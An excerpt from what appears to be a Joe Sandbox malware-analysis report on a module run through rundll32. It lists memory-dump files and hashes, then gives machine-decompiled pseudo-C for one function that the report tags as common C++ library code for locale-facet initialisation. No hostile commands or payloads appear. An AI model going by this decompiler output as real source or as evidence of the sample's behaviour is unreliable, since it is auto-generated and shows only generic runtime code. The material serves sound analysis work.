                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
                          • String ID: lm,n
                          • API String ID: 438560357-2206263333
                          • Opcode ID: 9b5121115db1075f85e04779bc2fd0571f1b2e1df53b73329ef1a14ecf9c44ce
                          • Instruction ID: 1c104a9268f021b353bb8231c8ab20f96f0e8e10f81fcfdd2560fc16708d8229
                          • Opcode Fuzzy Hash: 9b5121115db1075f85e04779bc2fd0571f1b2e1df53b73329ef1a14ecf9c44ce
                          • Instruction Fuzzy Hash: 5F11067990051E8FCF00DBE0C894AEEB77BAF84B15F240908E4206B3D0DF749A84C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F037, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F037(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t293;
				signed int _t294;
				void* _t306;
				void* _t319;
				void* _t332;
				void* _t345;
				void* _t358;
				void* _t371;
				void* _t384;
				void* _t397;
				void* _t410;
				void* _t423;
				void* _t436;
				void* _t449;
				void* _t462;
				void* _t475;
				void* _t488;
				void* _t501;
				void* _t514;
				void* _t527;
				void* _t540;
				signed int _t777;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t878;
				signed int _t879;
				signed int _t880;
				signed int _t881;
				void* _t902;

				_t838 = __edx;
				_t637 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t902 - 0x14, 0);
				_t861 =  *0x6e2c6db4; // 0x0
				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
				 *(_t902 - 0x10) = _t861;
				_t293 = E6E1E161C(0x6e2c6d68);
				_t640 =  *((intOrPtr*)(_t902 + 8));
				_t294 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t293);
				_t840 = _t294;
				if(_t294 != 0) {
					L5:
					E6E2066BA(_t902 - 0x14);
					return E6E220075(_t840);
				} else {
					if(_t861 == 0) {
						_push( *((intOrPtr*)(_t902 + 8)));
						_push(_t902 - 0x10);
						__eflags = E6E210DA5(__ebx, _t640, __edx, _t840, _t861) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t902 - 0x20);
							E6E223D74(_t902 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t840, _t861, 0x14);
							E6E206653(_t902 - 0x14, 0);
							_t862 =  *0x6e2c6dd4; // 0x0
							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
							 *(_t902 - 0x10) = _t862;
							_t306 = E6E1E161C(0x6e2c6b28);
							_t647 =  *((intOrPtr*)(_t902 + 8));
							_t841 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t306);
							__eflags = _t841;
							if(_t841 != 0) {
								L12:
								E6E2066BA(_t902 - 0x14);
								return E6E220075(_t841);
							} else {
								__eflags = _t862;
								if(_t862 == 0) {
									_push( *((intOrPtr*)(_t902 + 8)));
									_push(_t902 - 0x10);
									__eflags = E6E210E47(_t637, _t647, __edx, _t841, _t862) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t902 - 0x20);
										E6E223D74(_t902 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t637, _t841, _t862, 0x14);
										E6E206653(_t902 - 0x14, 0);
										_t863 =  *0x6e2c6de8; // 0x0
										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
										 *(_t902 - 0x10) = _t863;
										_t319 = E6E1E161C(0x6e2c6d94);
										_t654 =  *((intOrPtr*)(_t902 + 8));
										_t842 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t319);
										__eflags = _t842;
										if(_t842 != 0) {
											L19:
											E6E2066BA(_t902 - 0x14);
											return E6E220075(_t842);
										} else {
											__eflags = _t863;
											if(_t863 == 0) {
												_push( *((intOrPtr*)(_t902 + 8)));
												_push(_t902 - 0x10);
												__eflags = E6E210EB7(_t637, _t654, __edx, _t842, _t863) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t902 - 0x20);
													E6E223D74(_t902 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t637, _t842, _t863, 0x14);
													E6E206653(_t902 - 0x14, 0);
													_t864 =  *0x6e2c6db8; // 0x0
													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
													 *(_t902 - 0x10) = _t864;
													_t332 = E6E1E161C(0x6e2c6d6c);
													_t661 =  *((intOrPtr*)(_t902 + 8));
													_t843 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t332);
													__eflags = _t843;
													if(_t843 != 0) {
														L26:
														E6E2066BA(_t902 - 0x14);
														return E6E220075(_t843);
													} else {
														__eflags = _t864;
														if(_t864 == 0) {
															_push( *((intOrPtr*)(_t902 + 8)));
															_push(_t902 - 0x10);
															__eflags = E6E210F1F(_t637, _t661, _t838, _t843, _t864) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t902 - 0x20);
																E6E223D74(_t902 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t637, _t843, _t864, 0x14);
																E6E206653(_t902 - 0x14, 0);
																_t865 =  *0x6e2c6dec; // 0x0
																 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																 *(_t902 - 0x10) = _t865;
																_t345 = E6E1E161C(0x6e2c6d98);
																_t668 =  *((intOrPtr*)(_t902 + 8));
																_t844 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t345);
																__eflags = _t844;
																if(_t844 != 0) {
																	L33:
																	E6E2066BA(_t902 - 0x14);
																	return E6E220075(_t844);
																} else {
																	__eflags = _t865;
																	if(_t865 == 0) {
																		_push( *((intOrPtr*)(_t902 + 8)));
																		_push(_t902 - 0x10);
																		__eflags = E6E210F87(_t637, _t668, _t838, _t844, _t865) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t902 - 0x20);
																			E6E223D74(_t902 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t637, _t844, _t865, 0x14);
																			E6E206653(_t902 - 0x14, 0);
																			_t866 =  *0x6e2c6dbc; // 0x0
																			 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																			 *(_t902 - 0x10) = _t866;
																			_t358 = E6E1E161C(0x6e2c6d70);
																			_t675 =  *((intOrPtr*)(_t902 + 8));
																			_t845 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t358);
																			__eflags = _t845;
																			if(_t845 != 0) {
																				L40:
																				E6E2066BA(_t902 - 0x14);
																				return E6E220075(_t845);
																			} else {
																				__eflags = _t866;
																				if(_t866 == 0) {
																					_push( *((intOrPtr*)(_t902 + 8)));
																					_push(_t902 - 0x10);
																					__eflags = E6E210FEF(_t637, _t675, _t838, _t845, _t866) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t902 - 0x20);
																						E6E223D74(_t902 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t637, _t845, _t866, 0x14);
																						E6E206653(_t902 - 0x14, 0);
																						_t867 =  *0x6e2c6df0; // 0x0
																						 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																						 *(_t902 - 0x10) = _t867;
																						_t371 = E6E1E161C(0x6e2c6d9c);
																						_t682 =  *((intOrPtr*)(_t902 + 8));
																						_t846 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t371);
																						__eflags = _t846;
																						if(_t846 != 0) {
																							L47:
																							E6E2066BA(_t902 - 0x14);
																							return E6E220075(_t846);
																						} else {
																							__eflags = _t867;
																							if(_t867 == 0) {
																								_push( *((intOrPtr*)(_t902 + 8)));
																								_push(_t902 - 0x10);
																								__eflags = E6E211057(_t637, _t682, _t838, _t846, _t867) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t902 - 0x20);
																									E6E223D74(_t902 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t637, _t846, _t867, 0x14);
																									E6E206653(_t902 - 0x14, 0);
																									_t868 =  *0x6e2c6dc0; // 0x0
																									 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																									 *(_t902 - 0x10) = _t868;
																									_t384 = E6E1E161C(0x6e2c6d74);
																									_t689 =  *((intOrPtr*)(_t902 + 8));
																									_t847 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t384);
																									__eflags = _t847;
																									if(_t847 != 0) {
																										L54:
																										E6E2066BA(_t902 - 0x14);
																										return E6E220075(_t847);
																									} else {
																										__eflags = _t868;
																										if(_t868 == 0) {
																											_push( *((intOrPtr*)(_t902 + 8)));
																											_push(_t902 - 0x10);
																											__eflags = E6E2110BF(_t637, _t689, _t838, _t847, _t868) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t902 - 0x20);
																												E6E223D74(_t902 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t637, _t847, _t868, 0x14);
																												E6E206653(_t902 - 0x14, 0);
																												_t869 =  *0x6e2c6df8; // 0x0
																												 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																												 *(_t902 - 0x10) = _t869;
																												_t397 = E6E1E161C(0x6e2c6da4);
																												_t696 =  *((intOrPtr*)(_t902 + 8));
																												_t848 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t397);
																												__eflags = _t848;
																												if(_t848 != 0) {
																													L61:
																													E6E2066BA(_t902 - 0x14);
																													return E6E220075(_t848);
																												} else {
																													__eflags = _t869;
																													if(_t869 == 0) {
																														_push( *((intOrPtr*)(_t902 + 8)));
																														_push(_t902 - 0x10);
																														__eflags = E6E211127(_t637, _t696, _t838, _t848, _t869) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t902 - 0x20);
																															E6E223D74(_t902 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t637, _t848, _t869, 0x14);
																															E6E206653(_t902 - 0x14, 0);
																															_t870 =  *0x6e2c6df4; // 0x0
																															 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																															 *(_t902 - 0x10) = _t870;
																															_t410 = E6E1E161C(0x6e2c6da0);
																															_t703 =  *((intOrPtr*)(_t902 + 8));
																															_t849 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t410);
																															__eflags = _t849;
																															if(_t849 != 0) {
																																L68:
																																E6E2066BA(_t902 - 0x14);
																																return E6E220075(_t849);
																															} else {
																																__eflags = _t870;
																																if(_t870 == 0) {
																																	_push( *((intOrPtr*)(_t902 + 8)));
																																	_push(_t902 - 0x10);
																																	__eflags = E6E2111AB(_t637, _t703, _t838, _t849, _t870) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t902 - 0x20);
																																		E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t637, _t849, _t870, 0x14);
																																		E6E206653(_t902 - 0x14, 0);
																																		_t871 =  *0x6e2c6dc8; // 0x0
																																		 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																		 *(_t902 - 0x10) = _t871;
																																		_t423 = E6E1E161C(0x6e2c6d7c);
																																		_t710 =  *((intOrPtr*)(_t902 + 8));
																																		_t850 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t423);
																																		__eflags = _t850;
																																		if(_t850 != 0) {
																																			L75:
																																			E6E2066BA(_t902 - 0x14);
																																			return E6E220075(_t850);
																																		} else {
																																			__eflags = _t871;
																																			if(_t871 == 0) {
																																				_push( *((intOrPtr*)(_t902 + 8)));
																																				_push(_t902 - 0x10);
																																				__eflags = E6E211230(_t637, _t710, _t838, _t850, _t871) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t902 - 0x20);
																																					E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t637, _t850, _t871, 0x14);
																																					E6E206653(_t902 - 0x14, 0);
																																					_t872 =  *0x6e2c6dc4; // 0x0
																																					 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																					 *(_t902 - 0x10) = _t872;
																																					_t436 = E6E1E161C(0x6e2c6d78);
																																					_t717 =  *((intOrPtr*)(_t902 + 8));
																																					_t851 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t436);
																																					__eflags = _t851;
																																					if(_t851 != 0) {
																																						L82:
																																						E6E2066BA(_t902 - 0x14);
																																						return E6E220075(_t851);
																																					} else {
																																						__eflags = _t872;
																																						if(_t872 == 0) {
																																							_push( *((intOrPtr*)(_t902 + 8)));
																																							_push(_t902 - 0x10);
																																							__eflags = E6E2112B4(_t637, _t717, _t838, _t851, _t872) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t902 - 0x20);
																																								E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t637, _t851, _t872, 0x14);
																																								E6E206653(_t902 - 0x14, 0);
																																								_t873 =  *0x6e2c6dd8; // 0x0
																																								 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																								 *(_t902 - 0x10) = _t873;
																																								_t449 = E6E1E161C(0x6e2c6d84);
																																								_t724 =  *((intOrPtr*)(_t902 + 8));
																																								_t852 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t449);
																																								__eflags = _t852;
																																								if(_t852 != 0) {
																																									L89:
																																									E6E2066BA(_t902 - 0x14);
																																									return E6E220075(_t852);
																																								} else {
																																									__eflags = _t873;
																																									if(_t873 == 0) {
																																										_push( *((intOrPtr*)(_t902 + 8)));
																																										_push(_t902 - 0x10);
																																										__eflags = E6E211339(_t637, _t724, _t838, _t852, _t873) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t902 - 0x20);
																																											E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t637, _t852, _t873, 0x14);
																																											E6E206653(_t902 - 0x14, 0);
																																											_t874 =  *0x6e2c6db0; // 0x0
																																											 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																											 *(_t902 - 0x10) = _t874;
																																											_t462 = E6E1E161C(0x6e2c6d64);
																																											_t731 =  *((intOrPtr*)(_t902 + 8));
																																											_t853 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t462);
																																											__eflags = _t853;
																																											if(_t853 != 0) {
																																												L96:
																																												E6E2066BA(_t902 - 0x14);
																																												return E6E220075(_t853);
																																											} else {
																																												__eflags = _t874;
																																												if(_t874 == 0) {
																																													_push( *((intOrPtr*)(_t902 + 8)));
																																													_push(_t902 - 0x10);
																																													__eflags = E6E2113A1(_t637, _t731, _t838, _t853, _t874) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t902 - 0x20);
																																														E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t637, _t853, _t874, 0x14);
																																														E6E206653(_t902 - 0x14, 0);
																																														_t875 =  *0x6e2c6ddc; // 0x0
																																														 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																														 *(_t902 - 0x10) = _t875;
																																														_t475 = E6E1E161C(0x6e2c6d88);
																																														_t738 =  *((intOrPtr*)(_t902 + 8));
																																														_t854 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t475);
																																														__eflags = _t854;
																																														if(_t854 != 0) {
																																															L103:
																																															E6E2066BA(_t902 - 0x14);
																																															return E6E220075(_t854);
																																														} else {
																																															__eflags = _t875;
																																															if(_t875 == 0) {
																																																_push( *((intOrPtr*)(_t902 + 8)));
																																																_push(_t902 - 0x10);
																																																__eflags = E6E211409(_t637, _t738, _t838, _t854, _t875) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t902 - 0x20);
																																																	E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t637, _t854, _t875, 0x14);
																																																	E6E206653(_t902 - 0x14, 0);
																																																	_t876 =  *0x6e2c6de0; // 0x0
																																																	 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																	 *(_t902 - 0x10) = _t876;
																																																	_t488 = E6E1E161C(0x6e2c6d8c);
																																																	_t745 =  *((intOrPtr*)(_t902 + 8));
																																																	_t855 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t488);
																																																	__eflags = _t855;
																																																	if(_t855 != 0) {
																																																		L110:
																																																		E6E2066BA(_t902 - 0x14);
																																																		return E6E220075(_t855);
																																																	} else {
																																																		__eflags = _t876;
																																																		if(_t876 == 0) {
																																																			_push( *((intOrPtr*)(_t902 + 8)));
																																																			_push(_t902 - 0x10);
																																																			__eflags = E6E211471(_t637, _t745, _t838, _t855, _t876) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1E1438(_t902 - 0x20);
																																																				E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																																				asm("int3");
																																																				E6E2200AC(0x6e2683cf, _t637, _t855, _t876, 0x14);
																																																				E6E206653(_t902 - 0x14, 0);
																																																				_t877 =  *0x6e2c6dfc; // 0x0
																																																				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																				 *(_t902 - 0x10) = _t877;
																																																				_t501 = E6E1E161C(0x6e2c6da8);
																																																				_t752 =  *((intOrPtr*)(_t902 + 8));
																																																				_t856 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t501);
																																																				__eflags = _t856;
																																																				if(_t856 != 0) {
																																																					L117:
																																																					E6E2066BA(_t902 - 0x14);
																																																					return E6E220075(_t856);
																																																				} else {
																																																					__eflags = _t877;
																																																					if(_t877 == 0) {
																																																						_push( *((intOrPtr*)(_t902 + 8)));
																																																						_push(_t902 - 0x10);
																																																						__eflags = E6E2114EC(_t637, _t752, _t838, _t856, _t877) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1E1438(_t902 - 0x20);
																																																							E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																																							asm("int3");
																																																							E6E2200AC(0x6e2683cf, _t637, _t856, _t877, 0x14);
																																																							E6E206653(_t902 - 0x14, 0);
																																																							_t878 =  *0x6e2c6dcc; // 0x0
																																																							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																							 *(_t902 - 0x10) = _t878;
																																																							_t514 = E6E1E161C(0x6e2c6d80);
																																																							_t759 =  *((intOrPtr*)(_t902 + 8));
																																																							_t857 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t514);
																																																							__eflags = _t857;
																																																							if(_t857 != 0) {
																																																								L124:
																																																								E6E2066BA(_t902 - 0x14);
																																																								return E6E220075(_t857);
																																																							} else {
																																																								__eflags = _t878;
																																																								if(_t878 == 0) {
																																																									_push( *((intOrPtr*)(_t902 + 8)));
																																																									_push(_t902 - 0x10);
																																																									__eflags = E6E211558(_t637, _t759, _t838, _t857, _t878) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6E1E1438(_t902 - 0x20);
																																																										E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																																										asm("int3");
																																																										E6E2200AC(0x6e2683cf, _t637, _t857, _t878, 0x14);
																																																										E6E206653(_t902 - 0x14, 0);
																																																										_t879 =  *0x6e2c6e00; // 0x0
																																																										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																										 *(_t902 - 0x10) = _t879;
																																																										_t527 = E6E1E161C(0x6e2c6dac);
																																																										_t766 =  *((intOrPtr*)(_t902 + 8));
																																																										_t858 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t527);
																																																										__eflags = _t858;
																																																										if(_t858 != 0) {
																																																											L131:
																																																											E6E2066BA(_t902 - 0x14);
																																																											return E6E220075(_t858);
																																																										} else {
																																																											__eflags = _t879;
																																																											if(_t879 == 0) {
																																																												_push( *((intOrPtr*)(_t902 + 8)));
																																																												_push(_t902 - 0x10);
																																																												__eflags = E6E2115C4(_t637, _t766, _t838, _t858, _t879) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6E1E1438(_t902 - 0x20);
																																																													E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																																													asm("int3");
																																																													E6E2200AC(0x6e2683cf, _t637, _t858, _t879, 0x14);
																																																													E6E206653(_t902 - 0x14, 0);
																																																													_t880 =  *0x6e2c6dd0; // 0x0
																																																													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																													 *(_t902 - 0x10) = _t880;
																																																													_t540 = E6E1E161C(0x6e2c6d60);
																																																													_t773 =  *((intOrPtr*)(_t902 + 8));
																																																													_t859 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t540);
																																																													__eflags = _t859;
																																																													if(_t859 != 0) {
																																																														L138:
																																																														E6E2066BA(_t902 - 0x14);
																																																														return E6E220075(_t859);
																																																													} else {
																																																														__eflags = _t880;
																																																														if(_t880 == 0) {
																																																															_push( *((intOrPtr*)(_t902 + 8)));
																																																															_push(_t902 - 0x10);
																																																															__eflags = E6E21162A(_t637, _t773, _t838, _t859, _t880) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																_t777 = _t902 - 0x20;
																																																																E6E1E1438(_t777);
																																																																E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																																																asm("int3");
																																																																E6E2200AC(0x6e26851f, _t637, _t859, _t880, 4);
																																																																_t881 = _t777;
																																																																 *(_t902 - 0x10) = _t881;
																																																																 *((intOrPtr*)(_t881 + 4)) =  *((intOrPtr*)(_t902 + 0xc));
																																																																_push( *((intOrPtr*)(_t902 + 0x14)));
																																																																_t287 = _t902 - 4;
																																																																 *_t287 =  *(_t902 - 4) & 0x00000000;
																																																																__eflags =  *_t287;
																																																																 *_t881 = 0x6e26c0c4;
																																																																 *((char*)(_t881 + 0x28)) =  *((intOrPtr*)(_t902 + 0x10));
																																																																E6E21542F(_t637, _t777, _t838, _t859, _t881,  *_t287);
																																																																return E6E220075(_t881,  *((intOrPtr*)(_t902 + 8)));
																																																															} else {
																																																																_t859 =  *(_t902 - 0x10);
																																																																 *(_t902 - 0x10) = _t859;
																																																																 *(_t902 - 4) = 1;
																																																																E6E206FD3(__eflags, _t859);
																																																																 *0x6e26a26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t859 + 4))))();
																																																																 *0x6e2c6dd0 = _t859;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t859 = _t880;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t858 =  *(_t902 - 0x10);
																																																													 *(_t902 - 0x10) = _t858;
																																																													 *(_t902 - 4) = 1;
																																																													E6E206FD3(__eflags, _t858);
																																																													 *0x6e26a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t858 + 4))))();
																																																													 *0x6e2c6e00 = _t858;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t858 = _t879;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t857 =  *(_t902 - 0x10);
																																																										 *(_t902 - 0x10) = _t857;
																																																										 *(_t902 - 4) = 1;
																																																										E6E206FD3(__eflags, _t857);
																																																										 *0x6e26a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t857 + 4))))();
																																																										 *0x6e2c6dcc = _t857;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t857 = _t878;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t856 =  *(_t902 - 0x10);
																																																							 *(_t902 - 0x10) = _t856;
																																																							 *(_t902 - 4) = 1;
																																																							E6E206FD3(__eflags, _t856);
																																																							 *0x6e26a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t856 + 4))))();
																																																							 *0x6e2c6dfc = _t856;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t856 = _t877;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t855 =  *(_t902 - 0x10);
																																																				 *(_t902 - 0x10) = _t855;
																																																				 *(_t902 - 4) = 1;
																																																				E6E206FD3(__eflags, _t855);
																																																				 *0x6e26a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t855 + 4))))();
																																																				 *0x6e2c6de0 = _t855;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t855 = _t876;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t854 =  *(_t902 - 0x10);
																																																	 *(_t902 - 0x10) = _t854;
																																																	 *(_t902 - 4) = 1;
																																																	E6E206FD3(__eflags, _t854);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t854 + 4))))();
																																																	 *0x6e2c6ddc = _t854;
																																																	goto L103;
																																																}
																																															} else {
																																																_t854 = _t875;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t853 =  *(_t902 - 0x10);
																																														 *(_t902 - 0x10) = _t853;
																																														 *(_t902 - 4) = 1;
																																														E6E206FD3(__eflags, _t853);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t853 + 4))))();
																																														 *0x6e2c6db0 = _t853;
																																														goto L96;
																																													}
																																												} else {
																																													_t853 = _t874;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t852 =  *(_t902 - 0x10);
																																											 *(_t902 - 0x10) = _t852;
																																											 *(_t902 - 4) = 1;
																																											E6E206FD3(__eflags, _t852);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t852 + 4))))();
																																											 *0x6e2c6dd8 = _t852;
																																											goto L89;
																																										}
																																									} else {
																																										_t852 = _t873;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t851 =  *(_t902 - 0x10);
																																								 *(_t902 - 0x10) = _t851;
																																								 *(_t902 - 4) = 1;
																																								E6E206FD3(__eflags, _t851);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t851 + 4))))();
																																								 *0x6e2c6dc4 = _t851;
																																								goto L82;
																																							}
																																						} else {
																																							_t851 = _t872;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t850 =  *(_t902 - 0x10);
																																					 *(_t902 - 0x10) = _t850;
																																					 *(_t902 - 4) = 1;
																																					E6E206FD3(__eflags, _t850);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t850 + 4))))();
																																					 *0x6e2c6dc8 = _t850;
																																					goto L75;
																																				}
																																			} else {
																																				_t850 = _t871;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t849 =  *(_t902 - 0x10);
																																		 *(_t902 - 0x10) = _t849;
																																		 *(_t902 - 4) = 1;
																																		E6E206FD3(__eflags, _t849);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t849 + 4))))();
																																		 *0x6e2c6df4 = _t849;
																																		goto L68;
																																	}
																																} else {
																																	_t849 = _t870;
																																	goto L68;
																																}
																															}
																														} else {
																															_t848 =  *(_t902 - 0x10);
																															 *(_t902 - 0x10) = _t848;
																															 *(_t902 - 4) = 1;
																															E6E206FD3(__eflags, _t848);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t848 + 4))))();
																															 *0x6e2c6df8 = _t848;
																															goto L61;
																														}
																													} else {
																														_t848 = _t869;
																														goto L61;
																													}
																												}
																											} else {
																												_t847 =  *(_t902 - 0x10);
																												 *(_t902 - 0x10) = _t847;
																												 *(_t902 - 4) = 1;
																												E6E206FD3(__eflags, _t847);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t847 + 4))))();
																												 *0x6e2c6dc0 = _t847;
																												goto L54;
																											}
																										} else {
																											_t847 = _t868;
																											goto L54;
																										}
																									}
																								} else {
																									_t846 =  *(_t902 - 0x10);
																									 *(_t902 - 0x10) = _t846;
																									 *(_t902 - 4) = 1;
																									E6E206FD3(__eflags, _t846);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t846 + 4))))();
																									 *0x6e2c6df0 = _t846;
																									goto L47;
																								}
																							} else {
																								_t846 = _t867;
																								goto L47;
																							}
																						}
																					} else {
																						_t845 =  *(_t902 - 0x10);
